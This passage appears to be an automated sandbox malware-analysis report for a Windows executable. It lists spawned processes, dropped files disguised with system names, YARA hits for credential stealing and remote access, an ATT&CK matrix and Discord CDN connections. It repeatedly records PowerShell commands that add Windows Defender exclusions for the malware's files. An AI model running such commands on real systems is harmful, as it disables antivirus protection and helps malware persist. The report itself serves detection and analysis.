                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" userJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat" Jump to behavior
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" userJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess created: C:\Recovery\JRFdtWyAvbQxLlvO.exe "C:\Recovery\JRFdtWyAvbQxLlvO.exe" userJump to behavior
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe" user
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" user
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559264843.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000003.547617819.0000000003F2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd.zippath
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559264843.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000003.547617819.0000000003F2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerShowHide
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeQueries volume information: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeQueries volume information: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeQueries volume information: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformationJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeQueries volume information: C:\Recovery\JRFdtWyAvbQxLlvO.exe VolumeInformationJump to behavior
                    Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformationJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeQueries volume information: C:\Recovery\JRFdtWyAvbQxLlvO.exe VolumeInformation
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeQueries volume information: C:\System Volume Information\Chkdsk\SearchUI.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeQueries volume information: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe VolumeInformation
                    Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformation
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00F0FA90 CreateNamedPipeW,22_2_00F0FA90

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3d82590.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.550072018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.550360463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.559264843.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.551034384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.547617819.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe PID: 3496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe PID: 1956, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3d82590.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.550072018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.550360463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.559264843.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.551034384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.547617819.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe PID: 3496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe PID: 1956, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts11
                    Windows Management Instrumentation
                    1
                    Scheduled Task/Job
                    13
                    Process Injection
                    321
                    Masquerading
                    OS Credential Dumping1
                    Query Registry
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium11
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job
                    1
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    111
                    Disable or Modify Tools
                    LSASS Memory11
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scripting
                    Logon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    21
                    Virtualization/Sandbox Evasion
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                    Process Injection
                    NTDS21
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Scripting
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Obfuscated Files or Information
                    DCSync14
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Software Packing
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Timestomp
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 614288 Sample: 64AE5410F978DF0F48DCC675088... Startdate: 23/04/2022 Architecture: WINDOWS Score: 100 63 cdn.discordapp.com 2->63 71 Malicious sample detected (through community Yara rule) 2->71 73 Antivirus detection for dropped file 2->73 75 Antivirus / Scanner detection for submitted sample 2->75 77 12 other signatures 2->77 10 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe 2 2->10         started        14 ShellExperienceHost.exe 2->14         started        16 JRFdtWyAvbQxLlvO.exe 2 2->16         started        18 4 other processes 2->18 signatures3 process4 file5 61 64AE5410F978DF0F48...C566967E002.exe.log, ASCII 10->61 dropped 85 Adds a directory exclusion to Windows Defender 10->85 87 Creates processes via WMI 10->87 89 Drops PE files with benign system names 10->89 20 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe 16 4 10->20         started        91 Antivirus detection for dropped file 14->91 93 Multi AV Scanner detection for dropped file 14->93 95 Machine Learning detection for dropped file 14->95 97 Drops executables to the windows directory (C:\Windows) and starts them 14->97 25 JRFdtWyAvbQxLlvO.exe 16->25         started        99 Uses schtasks.exe or at.exe to add and modify task schedules 18->99 27 csrss.exe 14 2 18->27         started        29 schtasks.exe 18->29         started        31 schtasks.exe 18->31         started        33 4 other processes 18->33 signatures6 process7 dnsIp8 65 cdn.discordapp.com 162.159.129.233, 443, 49715, 49716 CLOUDFLARENETUS United States 20->65 57 C:\Users\user\AppData\...\qwevqjeiqvj.exe, PE32 20->57 dropped 59 C:\Users\...\qwevqjeiqvj.exe:Zone.Identifier, ASCII 20->59 dropped 83 Creates an undocumented autostart registry key 20->83 35 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe 9 26 20->35         started        67 162.159.130.233, 443, 49721 CLOUDFLARENETUS United States 27->67 69 162.159.133.233, 443, 49720, 49722 CLOUDFLARENETUS United States 27->69 file9 signatures10 process11 file12 49 C:\Windows\...\ShellExperienceHost.exe, PE32 35->49 dropped 51 C:\Windows\SysWOW64\iasnap\fontdrvhost.exe, PE32 35->51 dropped 53 C:\Windows\SysWOW64\comrepl\fontdrvhost.exe, PE32 35->53 dropped 55 8 other malicious files 35->55 dropped 79 Creates files inside the volume driver (system volume information) 35->79 81 Adds a directory exclusion to Windows 